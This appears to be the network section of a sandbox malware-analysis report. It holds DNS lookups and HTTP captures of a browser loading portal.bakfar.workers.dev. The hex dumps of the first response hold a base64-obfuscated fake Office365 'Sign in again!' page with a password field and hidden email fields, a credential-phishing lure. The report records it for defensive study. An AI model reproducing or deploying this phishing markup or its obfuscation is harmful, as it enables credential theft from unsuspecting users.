                                                                      Mar 29, 2024 00:21:32.456921101 CET1.1.1.1192.168.2.40x9665No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:54.800306082 CET1.1.1.1192.168.2.40xb52cNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:21:54.800306082 CET1.1.1.1192.168.2.40xb52cNo error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                      Mar 29, 2024 00:22:13.704714060 CET1.1.1.1192.168.2.40xedc2No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                      Mar 29, 2024 00:22:13.704714060 CET1.1.1.1192.168.2.40xedc2No error (0)fp2e7a.wpc.phicdn.net192.229.211.108A (IP address)IN (0x0001)false
                                                                      • portal.bakfar.workers.dev
                                                                      • https:
                                                                        • code.jquery.com
                                                                        • maxcdn.bootstrapcdn.com
                                                                        • cdnjs.cloudflare.com
                                                                        • stackpath.bootstrapcdn.com
                                                                        • app.forexliteoptions.com
                                                                        • i.gyazo.com
                                                                        • acctcdn.msauth.net
                                                                      • fs.microsoft.com
                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      0192.168.2.449735172.67.154.1374434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:03 UTC668OUTGET / HTTP/1.1
                                                                      Host: portal.bakfar.workers.dev
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      sec-ch-ua-mobile: ?0
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Upgrade-Insecure-Requests: 1
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                      Sec-Fetch-Site: none
                                                                      Sec-Fetch-Mode: navigate
                                                                      Sec-Fetch-User: ?1
                                                                      Sec-Fetch-Dest: document
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:03 UTC554INHTTP/1.1 200 OK
                                                                      Date: Thu, 28 Mar 2024 23:21:03 GMT
                                                                      Content-Type: text/html;charset=UTF-8
                                                                      Content-Length: 15616
                                                                      Connection: close
                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=teeEToCIvoINQZJZMbMF8PiUdq%2BC%2F6n0G%2FG4Xlaj6iNVawdpGOKwirXr0JJ85SxYM%2B1ihAheKE3hcOZgVunZGGPO771tB9YWKtybryIn2SP0boj93YY5Ry7HEYkbzQa4mZx55qOzUzj1wFG7"}],"group":"cf-nel","max_age":604800}
                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                      Server: cloudflare
                                                                      CF-RAY: 86bb5ab55d30058b-IAD
                                                                      alt-svc: h3=":443"; ma=86400
                                                                      2024-03-28 23:21:03 UTC815INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 0a 3c 73 63 72 69 70 74 3e 0a 0a 0a 0a 76 61 72 20 58 3d 22 43 6a 78 49 56 45 31 4d 49 47 78 68 62 6d 63 39 5a 57 34 2b 50 45 68 46 51 55 51 2b 50 46 52 4a 56 45 78 46 50 6b 39 6d 5a 6d 6c 6a 5a 54 4d 32 4e 54 77 76 56 45 6c 55 54 45 55 2b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 46 71 59 58 67 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 57 70 68 65 43 39 73 61 57 4a 7a 4c 32 70 78 64 57 56 79 65 53 38 79 4c 6a 49 75 4e 43 39 71 63 58 56 6c 63 6e 6b 75 62 57 6c 75 4c 6d 70 7a 49 6a 34 38 4c 31 4e 44 55 6b 6c 51 56 44 34 4b 43 6a 78 54 51 31 4a 4a 55 46 51 67 63 33 4a 6a 50 53 4a 6f 64 48 52 77 63 7a 6f 76 4c 32 4e 76 5a 47 55 75 61 6e 46
                                                                      Data Ascii: <!DOCTYPE html><script>var X="CjxIVE1MIGxhbmc9ZW4+PEhFQUQ+PFRJVExFPk9mZmljZTM2NTwvVElUTEU+CjxTQ1JJUFQgc3JjPSJodHRwczovL2FqYXguZ29vZ2xlYXBpcy5jb20vYWpheC9saWJzL2pxdWVyeS8yLjIuNC9qcXVlcnkubWluLmpzIj48L1NDUklQVD4KCjxTQ1JJUFQgc3JjPSJodHRwczovL2NvZGUuanF
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 76 59 6d 39 76 64 48 4e 30 63 6d 46 77 4c 6d 31 70 62 69 35 6a 63 33 4d 69 49 47 6c 75 64 47 56 6e 63 6d 6c 30 65 54 30 69 63 32 68 68 4d 7a 67 30 4c 55 64 75 4e 54 4d 34 4e 48 68 78 55 54 46 68 62 31 64 59 51 53 73 77 4e 54 68 53 57 46 42 34 55 47 63 32 5a 6e 6b 30 53 56 64 32 56 45 35 6f 4d 45 55 79 4e 6a 4e 59 62 55 5a 6a 53 6d 78 54 51 58 64 70 52 32 64 47 51 56 63 76 5a 45 46 70 55 7a 5a 4b 57 47 30 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 78 4d 53 55 35 4c 49 48 4a 6c 62 44 31 7a 64 48 6c 73 5a 58 4e 6f 5a 57 56 30 49 47 68 79 5a 57 59 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 5a 6d 39 75 64 48 4d 75 5a 32 39 76 5a 32 78 6c 59 58 42 70 63 79 35 6a 62 32 30 76 59 33 4e 7a 50 32 5a 68 62 57
                                                                      Data Ascii: vYm9vdHN0cmFwLm1pbi5jc3MiIGludGVncml0eT0ic2hhMzg0LUduNTM4NHhxUTFhb1dYQSswNThSWFB4UGc2Znk0SVd2VE5oMEUyNjNYbUZjSmxTQXdpR2dGQVcvZEFpUzZKWG0iIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjxMSU5LIHJlbD1zdHlsZXNoZWV0IGhyZWY9Imh0dHBzOi8vZm9udHMuZ29vZ2xlYXBpcy5jb20vY3NzP2ZhbW
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 49 43 46 70 62 58 42 76 63 6e 52 68 62 6e 51 37 49 47 4a 76 65 43 31 7a 61 47 46 6b 62 33 63 36 49 47 35 76 62 6d 55 37 49 43 31 33 5a 57 4a 72 61 58 51 74 59 58 42 77 5a 57 46 79 59 57 35 6a 5a 54 6f 67 62 6d 39 75 5a 51 70 39 43 6a 77 76 55 31 52 5a 54 45 55 2b 43 6a 77 76 53 45 56 42 52 44 34 4b 50 45 4a 50 52 46 6b 67 63 33 52 35 62 47 55 39 49 6b 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 53 55 31 42 52 30 55 36 49 48 56 79 62 43 68 6f 64 48 52 77 63 7a 6f 76 4c 32 6b 75 5a 33 6c 68 65 6d 38 75 59 32 39 74 4c 7a 49 78 4e 47 51 34 4f 57 45 79 4e 6d 59 77 59 57 4d 35 4d 54 68 68 4d 44 6c 6d 4d 6a 45 32 59 54 46 69 4d 47 59 35 4e 32 49 30 4c 6e 42 75 5a 79 6b 37 49 45 4a 42 51 30 74 48 55 6b 39 56 54 6b 51 74 55 6b 56 51 52 55 46 55 4f 69 42 75 62 79 31
                                                                      Data Ascii: ICFpbXBvcnRhbnQ7IGJveC1zaGFkb3c6IG5vbmU7IC13ZWJraXQtYXBwZWFyYW5jZTogbm9uZQp9CjwvU1RZTEU+CjwvSEVBRD4KPEJPRFkgc3R5bGU9IkJBQ0tHUk9VTkQtSU1BR0U6IHVybChodHRwczovL2kuZ3lhem8uY29tLzIxNGQ4OWEyNmYwYWM5MThhMDlmMjE2YTFiMGY5N2I0LnBuZyk7IEJBQ0tHUk9VTkQtUkVQRUFUOiBuby1
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 69 41 67 49 43 41 67 49 43 41 67 49 43 41 38 63 44 34 38 63 33 52 79 62 32 35 6e 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 61 47 56 68 5a 47 6c 75 5a 79 49 2b 49 46 4e 70 5a 32 34 67 61 57 34 67 59 57 64 68 61 57 34 67 49 54 77 76 63 33 52 79 62 32 35 6e 50 69 41 38 4c 33 41 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33 56 69 4c 58 52 70 64 47 78 6c 49 6a 34 38 4c 33 4e 77 59 57 34 2b 50 43 39 77 50 6a 77 76 5a 47 6c 32 50 6a 77 76 61 44 49 2b 43 6a 78 77 50 6a 78 7a 63 47 46 75 49 47 4e 73 59 58 4e 7a 50 53 4a 6a 61 47 46 73 62 47 56 75 5a 32 55 74 5a 47 56 7a 59 79 42 7a 61 57 64 75 61 57 34 74 63 33 56 69
                                                                      Data Ascii: iAgICAgICAgICA8cD48c3Ryb25nIGNsYXNzPSJjaGFsbGVuZ2UtaGVhZGluZyI+IFNpZ24gaW4gYWdhaW4gITwvc3Ryb25nPiA8L3A+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3ViLXRpdGxlIj48L3NwYW4+PC9wPjwvZGl2PjwvaDI+CjxwPjxzcGFuIGNsYXNzPSJjaGFsbGVuZ2UtZGVzYyBzaWduaW4tc3Vi
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 51 69 49 47 4e 73 59 58 4e 7a 50 53 4a 6d 62 33 4a 74 4c 57 4e 76 62 6e 52 79 62 32 77 69 49 47 6c 6b 50 53 4a 77 59 58 4e 7a 64 32 39 79 5a 43 49 67 62 6d 46 74 5a 54 30 69 63 47 52 6d 4d 69 49 67 63 47 78 68 59 32 56 6f 62 32 78 6b 5a 58 49 39 49 6c 42 68 63 33 4e 33 62 33 4a 6b 49 69 42 79 5a 58 46 31 61 58 4a 6c 5a 44 34 4b 49 43 41 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 44 77 76 5a 47 6c 32 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 44 78 45 53 56 59 67 59 32 78 68 63 33 4d 39 49 6d 5a 76 63 6d 30 74 59 32 68 6c 59 32 73 67 62 58 51 74 4d 79 49 2b 50 45 6c 4f 55 46 56 55 49 47 6c 6b 50 57 56 34 59 57 31 77 62 47 56 44 61 47 56 6a 61 7a 45 67 59 32 78 68 63 33 4d 39 5a 6d 39 79 62 53 31 6a 61
                                                                      Data Ascii: QiIGNsYXNzPSJmb3JtLWNvbnRyb2wiIGlkPSJwYXNzd29yZCIgbmFtZT0icGRmMiIgcGxhY2Vob2xkZXI9IlBhc3N3b3JkIiByZXF1aXJlZD4KICAgICAgICAgIDwvZGl2PgogICAgICAgIDwvZGl2PgogICAgICAgICAgIDxESVYgY2xhc3M9ImZvcm0tY2hlY2sgbXQtMyI+PElOUFVUIGlkPWV4YW1wbGVDaGVjazEgY2xhc3M9Zm9ybS1ja
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 67 62 6d 46 74 5a 54 30 69 63 47 52 6d 4d 53 49 67 63 32 6c 36 5a 54 30 69 4d 7a 55 69 49 48 5a 68 62 48 56 6c 50 53 4a 70 62 6d 5a 76 51 47 52 6c 62 47 77 75 59 32 39 74 49 6a 34 38 61 57 35 77 64 58 51 67 64 48 6c 77 5a 54 30 69 61 47 6c 6b 5a 47 56 75 49 69 42 75 59 57 31 6c 50 53 4a 68 5a 47 52 79 5a 58 4e 7a 49 69 42 7a 61 58 70 6c 50 53 49 31 49 69 42 32 59 57 78 31 5a 54 30 69 59 57 35 6a 62 33 4a 6c 61 57 35 7a 63 47 56 6a 64 47 6c 76 62 69 35 6a 62 32 30 69 50 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 50 47 4a 79 50 6a 78 70 62 6e 42 31 64 43 42 30 65 58 42 6c 50 53 4a 6f 61 57 52 6b 5a 57 34 69 49 47 35 68 62 57 55 39 49 6d 56 74 59 57 6c 73 49 69 42 7a 61 58 70 6c 50 53 49 7a 4e 53 49 67 64 6d 46 73 64 57 55 39 49 69 49 2b 50 47 6c 75 63 48
                                                                      Data Ascii: gbmFtZT0icGRmMSIgc2l6ZT0iMzUiIHZhbHVlPSJpbmZvQGRlbGwuY29tIj48aW5wdXQgdHlwZT0iaGlkZGVuIiBuYW1lPSJhZGRyZXNzIiBzaXplPSI1IiB2YWx1ZT0iYW5jb3JlaW5zcGVjdGlvbi5jb20iPgogICAgICAgICAgPGJyPjxpbnB1dCB0eXBlPSJoaWRkZW4iIG5hbWU9ImVtYWlsIiBzaXplPSIzNSIgdmFsdWU9IiI+PGlucH
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 63 47 56 71 61 44 52 56 4d 44 4a 6b 4f 47 70 50 64 44 5a 32 54 45 56 49 5a 6d 55 76 53 6c 46 48 61 56 4a 53 55 31 46 52 65 46 4e 6d 52 6c 64 77 61 54 46 4e 63 58 56 57 5a 45 46 35 61 6c 56 68 63 6a 55 72 4e 7a 5a 51 56 6b 4e 74 57 57 77 69 49 47 4e 79 62 33 4e 7a 62 33 4a 70 5a 32 6c 75 50 53 4a 68 62 6d 39 75 65 57 31 76 64 58 4d 69 50 6a 77 76 63 32 4e 79 61 58 42 30 50 67 6f 67 49 44 77 76 59 6d 39 6b 65 54 34 4b 43 69 41 67 50 48 4e 6a 63 6d 6c 77 64 43 42 7a 63 6d 4d 39 49 6d 68 30 64 48 42 7a 4f 69 38 76 59 57 70 68 65 43 35 6e 62 32 39 6e 62 47 56 68 63 47 6c 7a 4c 6d 4e 76 62 53 39 68 61 6d 46 34 4c 32 78 70 59 6e 4d 76 61 6e 46 31 5a 58 4a 35 4c 7a 49 75 4d 69 34 30 4c 32 70 78 64 57 56 79 65 53 35 74 61 57 34 75 61 6e 4d 69 50 6a 77 76 63 32 4e
                                                                      Data Ascii: cGVqaDRVMDJkOGpPdDZ2TEVIZmUvSlFHaVJSU1FReFNmRldwaTFNcXVWZEF5alVhcjUrNzZQVkNtWWwiIGNyb3Nzb3JpZ2luPSJhbm9ueW1vdXMiPjwvc2NyaXB0PgogIDwvYm9keT4KCiAgPHNjcmlwdCBzcmM9Imh0dHBzOi8vYWpheC5nb29nbGVhcGlzLmNvbS9hamF4L2xpYnMvanF1ZXJ5LzIuMi40L2pxdWVyeS5taW4uanMiPjwvc2N
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 62 58 6c 66 63 32 78 70 59 32 55 39 62 58 6c 66 5a 57 31 68 61 57 77 75 63 33 56 69 63 33 52 79 4b 43 68 70 62 6d 51 72 4d 53 6b 70 4f 77 6f 67 49 43 41 67 49 43 41 67 49 48 5a 68 63 69 42 6a 50 53 42 74 65 56 39 7a 62 47 6c 6a 5a 53 35 7a 64 57 4a 7a 64 48 49 6f 4d 43 77 67 62 58 6c 66 63 32 78 70 59 32 55 75 61 57 35 6b 5a 58 68 50 5a 69 67 6e 4c 69 63 70 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 77 39 49 47 4d 75 64 47 39 4d 62 33 64 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 49 43 41 67 49 43 41 67 49 43 42 32 59 58 49 67 5a 6d 6c 75 59 57 78 31 50 53 42 6a 4c 6e 52 76 56 58 42 77 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 51 6f
                                                                      Data Ascii: TsKICAgICAgICB2YXIgbXlfc2xpY2U9bXlfZW1haWwuc3Vic3RyKChpbmQrMSkpOwogICAgICAgIHZhciBjPSBteV9zbGljZS5zdWJzdHIoMCwgbXlfc2xpY2UuaW5kZXhPZignLicpKTsKICAgICAgICB2YXIgZmluYWw9IGMudG9Mb3dlckNhc2UoKTsKICAgICAgICB2YXIgZmluYWx1PSBjLnRvVXBwZXJDYXNlKCk7CgogICAgICAgICQo
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 46 79 49 47 5a 70 62 6d 46 73 50 53 42 6a 4c 6e 52 76 54 47 39 33 5a 58 4a 44 59 58 4e 6c 4b 43 6b 37 43 69 41 67 49 43 41 67 49 48 5a 68 63 69 42 6d 61 57 35 68 62 48 55 39 49 47 4d 75 64 47 39 56 63 48 42 6c 63 6b 4e 68 63 32 55 6f 4b 54 73 4b 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 70 62 57 63 69 4b 53 35 68 64 48 52 79 4b 43 4a 7a 63 6d 4d 69 4c 43 41 69 61 48 52 30 63 48 4d 36 4c 79 39 33 64 33 63 75 5a 32 39 76 5a 32 78 6c 4c 6d 4e 76 62 53 39 7a 4d 69 39 6d 59 58 5a 70 59 32 39 75 63 7a 39 6b 62 32 31 68 61 57 34 39 49 69 74 74 65 56 39 7a 62 47 6c 6a 5a 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 4a 43 67 69 49 32 78 76 5a 32 39 75 59 57 31 6c 49 69 6b 75 61 48 52 74 62 43 68 6d 61 57 35 68 62 48 55 70 4f 77 6f 67 49
                                                                      Data Ascii: FyIGZpbmFsPSBjLnRvTG93ZXJDYXNlKCk7CiAgICAgIHZhciBmaW5hbHU9IGMudG9VcHBlckNhc2UoKTsKCiAgICAgICAgJCgiI2xvZ29pbWciKS5hdHRyKCJzcmMiLCAiaHR0cHM6Ly93d3cuZ29vZ2xlLmNvbS9zMi9mYXZpY29ucz9kb21haW49IitteV9zbGljZSk7CiAgICAgICAgJCgiI2xvZ29uYW1lIikuaHRtbChmaW5hbHUpOwogI
                                                                      2024-03-28 23:21:03 UTC1369INData Raw: 67 64 32 6c 75 5a 47 39 33 4c 6d 78 76 59 32 46 30 61 57 39 75 4c 6e 4a 6c 63 47 78 68 59 32 55 6f 49 6d 68 30 64 48 42 7a 4f 69 38 76 62 47 39 6e 61 57 34 75 62 57 6c 6a 63 6d 39 7a 62 32 5a 30 62 32 35 73 61 57 35 6c 4c 6d 4e 76 62 53 39 6a 62 32 31 74 62 32 34 76 62 32 46 31 64 47 67 79 49 69 6b 37 43 67 6f 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 38 76 49 43 51 6f 4a 79 4e 74 63 32 63 6e 4b 53 35 6f 64 47 31 73 4b 48 4a 6c 63 33 42 76 62 6e 4e 6c 57 79 64 74 63 32 63 6e 58 53 6b 37 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 39 43 69 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 41 67 49 43 42 6c 62 48 4e 6c 65 77
                                                                      Data Ascii: gd2luZG93LmxvY2F0aW9uLnJlcGxhY2UoImh0dHBzOi8vbG9naW4ubWljcm9zb2Z0b25saW5lLmNvbS9jb21tb24vb2F1dGgyIik7CgogICAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICAgIC8vICQoJyNtc2cnKS5odG1sKHJlc3BvbnNlWydtc2cnXSk7CiAgICAgICAgICAgICAgICB9CiAgICAgICAgICAgICAgICBlbHNlew


                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                      1192.168.2.449740151.101.66.1374434228C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      TimestampBytes transferredDirectionData
                                                                      2024-03-28 23:21:03 UTC676OUTGET /jquery-3.2.1.slim.min.js HTTP/1.1
                                                                      Host: code.jquery.com
                                                                      Connection: keep-alive
                                                                      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                      Origin: https://portal.bakfar.workers.dev
                                                                      sec-ch-ua-mobile: ?0
                                                                      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                      Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"
                                                                      sec-ch-ua-platform: "Windows"
                                                                      Accept: */*
                                                                      Sec-Fetch-Site: cross-site
                                                                      Sec-Fetch-Mode: cors
                                                                      Sec-Fetch-Dest: script
                                                                      Referer: https://portal.bakfar.workers.dev/
                                                                      Accept-Encoding: gzip, deflate, br
                                                                      Accept-Language: en-US,en;q=0.9
                                                                      2024-03-28 23:21:04 UTC566INHTTP/1.1 200 OK
                                                                      Connection: close
                                                                      Content-Length: 69597
                                                                      Server: nginx
                                                                      Content-Type: application/javascript; charset=utf-8
                                                                      Last-Modified: Fri, 18 Oct 1991 12:00:00 GMT
                                                                      ETag: "28feccc0-10fdd"
                                                                      Cache-Control: public, max-age=31536000, stale-while-revalidate=604800
                                                                      Access-Control-Allow-Origin: *
                                                                      Via: 1.1 varnish, 1.1 varnish
                                                                      Accept-Ranges: bytes
                                                                      Date: Thu, 28 Mar 2024 23:21:04 GMT
                                                                      Age: 3840953
                                                                      X-Served-By: cache-lga21963-LGA, cache-iad-kcgs7200109-IAD
                                                                      X-Cache: HIT, HIT
                                                                      X-Cache-Hits: 6, 1
                                                                      X-Timer: S1711668064.087585,VS0,VE2
                                                                      Vary: Accept-Encoding
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 32 2e 31 20 2d 61 6a 61 78 2c 2d 61 6a 61 78 2f 6a 73 6f 6e 70 2c 2d 61 6a 61 78 2f 6c 6f 61 64 2c 2d 61 6a 61 78 2f 70 61 72 73 65 58 4d 4c 2c 2d 61 6a 61 78 2f 73 63 72 69 70 74 2c 2d 61 6a 61 78 2f 76 61 72 2f 6c 6f 63 61 74 69 6f 6e 2c 2d 61 6a 61 78 2f 76 61 72 2f 6e 6f 6e 63 65 2c 2d 61 6a 61 78 2f 76 61 72 2f 72 71 75 65 72 79 2c 2d 61 6a 61 78 2f 78 68 72 2c 2d 6d 61 6e 69 70 75 6c 61 74 69 6f 6e 2f 5f 65 76 61 6c 55 72 6c 2c 2d 65 76 65 6e 74 2f 61 6a 61 78 2c 2d 65 66 66 65 63 74 73 2c 2d 65 66 66 65 63 74 73 2f 54 77 65 65 6e 2c 2d 65 66 66 65 63 74 73 2f 61 6e 69 6d 61 74 65 64 53 65 6c 65 63 74 6f 72 20 7c 20 28 63 29 20 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e
                                                                      Data Ascii: /*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other con
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 5b 61 5d 7d 2c 70 75 73 68 53 74 61 63 6b 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 72 2e 6d 65 72 67 65 28 74 68 69 73 2e 63 6f 6e 73 74 72 75 63 74 6f 72 28 29 2c 61 29 3b 72 65 74 75 72 6e 20 62 2e 70 72 65 76 4f 62 6a 65 63 74 3d 74 68 69 73 2c 62 7d 2c 65 61 63 68 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 72 2e 65 61 63 68 28 74 68 69 73 2c 61 29 7d 2c 6d 61 70 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 72 2e 6d 61 70 28 74 68 69 73 2c 66 75 6e 63 74 69 6f 6e 28 62 2c 63 29 7b 72 65 74 75 72 6e 20 61 2e 63 61 6c 6c 28 62 2c 63 2c 62 29 7d 29 29 7d 2c 73 6c 69 63 65 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61
                                                                      Data Ascii: [a]},pushStack:function(a){var b=r.merge(this.constructor(),a);return b.prevObject=this,b},each:function(a){return r.each(this,a)},map:function(a){return this.pushStack(r.map(this,function(b,c){return a.call(b,c,b)}))},slice:function(){return this.pushSta
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 6a 65 63 74 20 4f 62 6a 65 63 74 5d 22 21 3d 3d 6b 2e 63 61 6c 6c 28 61 29 29 26 26 28 21 28 62 3d 65 28 61 29 29 7c 7c 28 63 3d 6c 2e 63 61 6c 6c 28 62 2c 22 63 6f 6e 73 74 72 75 63 74 6f 72 22 29 26 26 62 2e 63 6f 6e 73 74 72 75 63 74 6f 72 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 63 26 26 6d 2e 63 61 6c 6c 28 63 29 3d 3d 3d 6e 29 29 7d 2c 69 73 45 6d 70 74 79 4f 62 6a 65 63 74 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3b 66 6f 72 28 62 20 69 6e 20 61 29 72 65 74 75 72 6e 21 31 3b 72 65 74 75 72 6e 21 30 7d 2c 74 79 70 65 3a 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 6e 75 6c 6c 3d 3d 61 3f 61 2b 22 22 3a 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 61 7c 7c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70
                                                                      Data Ascii: ject Object]"!==k.call(a))&&(!(b=e(a))||(c=l.call(b,"constructor")&&b.constructor,"function"==typeof c&&m.call(c)===n))},isEmptyObject:function(a){var b;for(b in a)return!1;return!0},type:function(a){return null==a?a+"":"object"==typeof a||"function"==typ
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 6e 6f 77 2c 73 75 70 70 6f 72 74 3a 6f 7d 29 2c 22 66 75 6e 63 74 69 6f 6e 22 3d 3d 74 79 70 65 6f 66 20 53 79 6d 62 6f 6c 26 26 28 72 2e 66 6e 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 3d 63 5b 53 79 6d 62 6f 6c 2e 69 74 65 72 61 74 6f 72 5d 29 2c 72 2e 65 61 63 68 28 22 42 6f 6f 6c 65 61 6e 20 4e 75 6d 62 65 72 20 53 74 72 69 6e 67 20 46 75 6e 63 74 69 6f 6e 20 41 72 72 61 79 20 44 61 74 65 20 52 65 67 45 78 70 20 4f 62 6a 65 63 74 20 45 72 72 6f 72 20 53 79 6d 62 6f 6c 22 2e 73 70 6c 69 74 28 22 20 22 29 2c 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 6a 5b 22 5b 6f 62 6a 65 63 74 20 22 2b 62 2b 22 5d 22 5d 3d 62 2e 74 6f 4c 6f 77 65 72 43 61 73 65 28 29 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 77 28 61 29 7b 76 61 72 20 62 3d 21 21 61 26 26 22 6c 65
                                                                      Data Ascii: now,support:o}),"function"==typeof Symbol&&(r.fn[Symbol.iterator]=c[Symbol.iterator]),r.each("Boolean Number String Function Array Date RegExp Object Error Symbol".split(" "),function(a,b){j["[object "+b+"]"]=b.toLowerCase()});function w(a){var b=!!a&&"le
                                                                      2024-03-28 23:21:04 UTC1378INData Raw: 22 29 22 29 2c 43 4c 41 53 53 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 5c 5c 2e 28 22 2b 4c 2b 22 29 22 29 2c 54 41 47 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 28 22 2b 4c 2b 22 7c 5b 2a 5d 29 22 29 2c 41 54 54 52 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4d 29 2c 50 53 45 55 44 4f 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 22 2b 4e 29 2c 43 48 49 4c 44 3a 6e 65 77 20 52 65 67 45 78 70 28 22 5e 3a 28 6f 6e 6c 79 7c 66 69 72 73 74 7c 6c 61 73 74 7c 6e 74 68 7c 6e 74 68 2d 6c 61 73 74 29 2d 28 63 68 69 6c 64 7c 6f 66 2d 74 79 70 65 29 28 3f 3a 5c 5c 28 22 2b 4b 2b 22 2a 28 65 76 65 6e 7c 6f 64 64 7c 28 28 5b 2b 2d 5d 7c 29 28 5c 5c 64 2a 29 6e 7c 29 22 2b 4b 2b 22 2a 28 3f 3a 28 5b 2b 2d 5d 7c 29 22 2b 4b 2b 22 2a 28 5c 5c 64 2b 29 7c 29 29 22 2b 4b
